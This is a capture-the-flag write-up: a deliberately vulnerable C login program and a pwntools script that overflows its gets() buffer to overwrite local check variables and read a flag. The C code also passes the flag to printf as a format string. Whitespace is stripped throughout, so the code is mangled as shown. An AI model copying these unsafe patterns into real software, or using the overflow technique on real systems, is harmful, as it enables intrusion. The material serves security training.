I made a program (source) to protect my flag. On the off chance someone does get in, I added some sanity checks to detect if something fishy is going on.
Source
#include<stdio.h>#include<stdlib.h>#include<string.h>voidmain(){setbuf(stdout,NULL);setbuf(stderr,NULL);char password[64];int ways_to_leave_your_lover =0;int what_i_cant_drive =0;int when_im_walking_out_on_center_circle =0;int which_highway_to_take_my_telephones_to =0;int when_i_learned_the_truth =0;printf("Enter the secret word: ");gets(&password);if(strcmp(password,"password123")==0){puts("Logged in! Let's just do some quick checks to make sure everything's in order...");if (ways_to_leave_your_lover ==50) {if (what_i_cant_drive ==55) {if (when_im_walking_out_on_center_circle ==245) {if (which_highway_to_take_my_telephones_to ==61) {if (when_i_learned_the_truth ==17) {char flag[128]; FILE *f =fopen("flag.txt","r");if (!f) {printf("Missing flag.txt. Contact an admin if you see this on remote.");exit(1); }fgets(flag,128, f);printf(flag);return; } } } } }puts("Nope, something seems off."); } else {puts("Login failed!"); }}
Solution
from pwn import*defstart(argv=[],*a,**kw):if args.GDB:# Set GDBscript belowreturn gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)elif args.REMOTE:# ('server', 'port')returnremote(sys.argv[1], sys.argv[2], *a, **kw)else:# Run locallyreturnprocess([exe] + argv, *a, **kw)deffind_ip(payload):# Launch process and send payload p =process(exe) p.sendlineafter(':', payload)# Wait for the process to crash p.wait()# Print out the address of EIP/RIP at the time of crashing ip_offset =cyclic_find(p.corefile.read(p.corefile.sp, 4))info('located EIP/RIP offset at {a}'.format(a=ip_offset))return ip_offset# Specify your GDB script here for debugginggdbscript ='''init-pwndbgbreak *0x401235break *0x40123fcontinue'''.format(**locals())# Set up pwntools for the correct architectureexe ='./checks'# This will automatically get context arch, bits, os etcelf = context.binary =ELF(exe, checksec=False)# Enable verbose logging so we can see exactly what is being sent (info/debug)context.log_level ='debug'# ===========================================================# EXPLOIT GOES HERE# ===========================================================password =b"password123\x00"# Pass in pattern_size, get back EIP/RIP offsetoffset =find_ip(password +cyclic(100))offset -=len(password)# Start programio =start()# Build the payloadpayload =flat([ password, (offset -16) *asm('nop'),p32(0x11),p32(0x3d),p32(0xf5),p32(0x37),p32(0x32),])# Save the payload to filewrite('payload', payload)# Send the payloadio.sendlineafter(':', payload)io.recvline()# Get our flag!flag = io.recv()success(flag)
